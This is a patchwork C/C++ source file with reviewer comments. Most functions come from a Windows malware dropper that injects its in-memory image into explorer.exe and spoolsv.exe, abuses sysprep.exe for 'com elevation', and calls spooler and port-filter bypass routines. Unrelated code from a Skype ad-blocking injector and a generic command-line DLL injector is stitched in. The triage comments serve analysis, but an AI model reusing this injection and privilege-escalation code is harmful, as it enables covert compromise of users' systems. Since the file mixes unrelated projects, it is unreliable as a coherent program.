/**
 * Chooses what this DLL does once loaded, keyed on the file name of the host
 * executable (case-insensitive compare against four names):
 *
 *   MAIN_WORK_PROCESS -> run MainWorkThread in this process
 *   explorer.exe      -> run ExplorerWorkThread in this process
 *   spoolsv.exe       -> call InjectProcess() on MAIN_WORK_PROCESS; only if that
 *                        fails, take an extra reference on the DLL and run
 *                        MainWorkThread here
 *   sysprep.exe       -> call InjectProcess() on MAIN_WORK_PROCESS, then end
 *                        the host process with ExitProcess()
 *
 * @param hDll       Module handle of this DLL; not used in the body.
 * @param lpExePath  Path of the host executable; only the file-name part is compared.
 * @return TRUE only when a worker thread was created in the current process.
 *         FALSE for an unrecognised host, for a successful hand-off from the
 *         spooler, and when CreateThread fails. The sysprep.exe branch does
 *         not return.
 *
 * NOTE(review): for triage, the host names above are the processes this image
 * expects to run in. What this function makes observable is a thread started
 * from this module inside explorer.exe or spoolsv.exe, and sysprep.exe acting
 * on another process and exiting immediately afterwards.
 */
BOOL DropperDllWork(HMODULE hDll,LPCSTR lpExePath)
{
    LPCSTR hostName = PathFindFileName(lpExePath);
    LPTHREAD_START_ROUTINE worker = NULL;

    if (_stricmp(MAIN_WORK_PROCESS, hostName) == 0)
    {
        worker = MainWorkThread;
    }
    else if (_stricmp("explorer.exe", hostName) == 0)
    {
        worker = ExplorerWorkThread;
    }
    else if (_stricmp("spoolsv.exe", hostName) == 0)
    {
        // Original comment: "inject worker process in other session" (last argument FALSE).
        BOOL handedOff = InjectProcess(MAIN_WORK_PROCESS, g_pvImageBase, g_dwImageSize, FALSE);
        if (!handedOff)
        {
            // Extra LoadLibrary reference so the DLL is not unloaded while the
            // fallback worker thread runs inside the spooler.
            LoadLibrary(g_chDllPath);
            worker = MainWorkThread;
        }
    }
    else if (_stricmp("sysprep.exe", hostName) == 0)
    {
        // The original comment tags this branch "com elevation"; the mechanism
        // that gets the DLL into sysprep.exe is not visible in this function.
        // The InjectProcess result is ignored and the host is terminated.
        InjectProcess(MAIN_WORK_PROCESS, g_pvImageBase, g_dwImageSize, FALSE);
        ExitProcess(ERROR_SUCCESS);
    }

    if (worker == NULL)
    {
        return FALSE;
    }

    HANDLE hThread = CreateThread(NULL, 0, worker, NULL, 0, NULL);
    if (hThread == NULL)
    {
        return FALSE;
    }

    // The handle is not needed; the thread keeps running after it is closed.
    CloseHandle(hThread);
    return TRUE;
}
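/**
 * Walks a process snapshot and calls InjectProcess(pid) for every process
 * whose image name is "skype.exe" (case-insensitive).
 *
 * Shows a message box and stops at the first InjectProcess failure
 * (text: failed to inject SkypeNoBingHook.dll into the Skype process), or
 * shows one after the walk if no matching process was handled (text:
 * Skype.exe process not found).
 *
 * Changes from the previous version:
 *  - the snapshot handle is closed on the early-return path as well;
 *  - the entry returned by Process32First is examined instead of skipped;
 *  - a failed CreateToolhelp32Snapshot (INVALID_HANDLE_VALUE) is no longer
 *    passed to Process32First / CloseHandle;
 *  - the process-id argument of CreateToolhelp32Snapshot is 0, not NULL;
 *  - the name compare uses the TCHAR routine, matching the _T() literal.
 *
 * NOTE(review): matching on the image name alone means any process named
 * skype.exe is treated as the target; the caller has no say in which one.
 */
void InjectSkype()
{
    bool injected = false;

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot != INVALID_HANDLE_VALUE)
    {
        PROCESSENTRY32 entry;
        entry.dwSize = sizeof(PROCESSENTRY32);  // must be set before Process32First

        if (Process32First(snapshot, &entry))
        {
            do
            {
                if (_tcsicmp(entry.szExeFile, _T("skype.exe")) != 0)
                {
                    continue;
                }

                if (!InjectProcess(entry.th32ProcessID))
                {
                    MessageBox(NULL, _T("Не удалось внедрить SkypeNoBingHook.dll в процесс Skype"), _T("SkypeNoBing"), MB_OK | MB_ICONEXCLAMATION);
                    CloseHandle(snapshot);  // previously leaked on this path
                    return;
                }
                injected = true;
            } while (Process32Next(snapshot, &entry));
        }

        CloseHandle(snapshot);
    }

    if (!injected)
    {
        MessageBox(NULL, _T("Процесс Skype.exe не найден"), _T("SkypeNoBing"), MB_OK | MB_ICONEXCLAMATION);
    }
}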
/**
 * Non-elevated entry path: forwards to InjectProcess() with "explorer.exe"
 * as the target name and the module's own image (g_pvImageBase /
 * g_dwImageSize) as the payload description.
 *
 * The final TRUE argument corresponds to "current session" in the original
 * comment; the sibling calls that pass FALSE are commented "other session".
 *
 * @return Whatever InjectProcess() returns.
 *
 * NOTE(review): presumably InjectProcess copies the in-memory image into the
 * target rather than loading a file from disk - confirm against its
 * definition, since that decides whether file-based scanning can see it.
 */
BOOL DropperExeUser()
{
    return InjectProcess("explorer.exe", g_pvImageBase, g_dwImageSize, TRUE);
}
/**
 * Resolves a process name to process ids and calls InjectProcess(pid, 0) on
 * each in turn, stopping at the first call that succeeds.
 *
 * @param ProcessName  Image name handed to Utils::GetProcessIdByName.
 * @return TRUE as soon as one InjectProcess call succeeds, FALSE if none did
 *         or no process id was returned.
 *
 * NOTE(review): at most RTL_NUMBER_OF(Pids) == 10 ids can be stored. The loop
 * trusts the returned count; if GetProcessIdByName can report more matches
 * than it stored, the loop would read past the array - verify its contract.
 * NOTE(review): '%S' is used with an LPSTR argument; whether that is correct
 * depends on whether DbgMsg formats narrow or wide text, which is not visible here.
 */
BOOLEAN Inject::InjectProcessByName(LPSTR ProcessName)
{
    DWORD Pids[10];
    DWORD Found = Utils::GetProcessIdByName(ProcessName, Pids, RTL_NUMBER_OF(Pids));

    for (DWORD Index = 0; Index < Found; ++Index)
    {
        if (!InjectProcess(Pids[Index], 0))
        {
            // This instance could not be handled; try the next id.
            continue;
        }

        DbgMsg(__FUNCTION__"(): Inject to '%S' ok\r\n", ProcessName);
        return TRUE;
    }

    return FALSE;
}
/**
 * Elevated entry path. Order of operations:
 *   1. PortFilterBypassHook() - original comment: "setup rpc control port
 *      redirection"; its result, if any, is not checked.
 *   2. SpoolerBypass(g_chDllPath) - preferred route.
 *   3. Only if step 2 reports failure: InjectProcess() on MAIN_WORK_PROCESS
 *      with the module's own image, last argument TRUE ("current session"
 *      per the original comment).
 *
 * @return The SpoolerBypass result when it is non-zero, otherwise the
 *         InjectProcess result.
 *
 * NOTE(review): presumably SpoolerBypass gets the DLL at g_chDllPath loaded by
 * the print spooler (DropperDllWork has a spoolsv.exe branch) - confirm
 * against its definition. If so, an unexpected module load in spoolsv.exe is
 * the artefact to look for before the fallback path is ever taken.
 */
BOOL DropperExeAdmin()
{
    PortFilterBypassHook();

    BOOL viaSpooler = SpoolerBypass(g_chDllPath);
    if (viaSpooler)
    {
        return viaSpooler;
    }

    // Fallback when the spooler route reports failure.
    return InjectProcess(MAIN_WORK_PROCESS, g_pvImageBase, g_dwImageSize, TRUE);
}
/**
 * Command-line front end: expects exactly two arguments, a DLL path and a
 * process id, echoes them, calls EnableDebugPrivilege() and then
 * InjectProcess(path, pid).
 *
 * @return 1 when InjectProcess succeeds, 0 on failure or on a usage error.
 *         This is the reverse of the usual "0 means success" exit-code
 *         convention, so scripts checking the exit status must account for it.
 *
 * NOTE(review): the pid is parsed with _wtoi on a _TCHAR* argument, which only
 * matches in a Unicode build (_ttoi is the TCHAR-neutral form). _wtoi yields 0
 * for non-numeric text, and that value is passed on without validation.
 * NOTE(review): the return value of EnableDebugPrivilege() is ignored.
 * Presumably it enables SeDebugPrivilege on the current token - confirm; if
 * so, the privilege adjustment followed by access to another process is what
 * endpoint telemetry would record for a run of this tool.
 */
int _tmain(int argc, _TCHAR* argv[])
{
    if (argc != 3)
    {
        printf("command line error,please input like this:\n\"dll path\" pid\n");
        return 0;
    }

    _TCHAR* dllPath = argv[1];
    _TCHAR* pidText = argv[2];
    _tprintf(_T("%s %s\n"), dllPath, pidText);

    EnableDebugPrivilege();

    if (!InjectProcess(dllPath, _wtoi(pidText)))
    {
        // Read the error code before any further API call can overwrite it.
        DWORD dwError = GetLastError();
        _tprintf(_T("inject failed %d!"), dwError);
        return 0;
    }

    _tprintf(_T("inject sucessed!\n"));
    NotifyGdiChecker();
    return 1;
}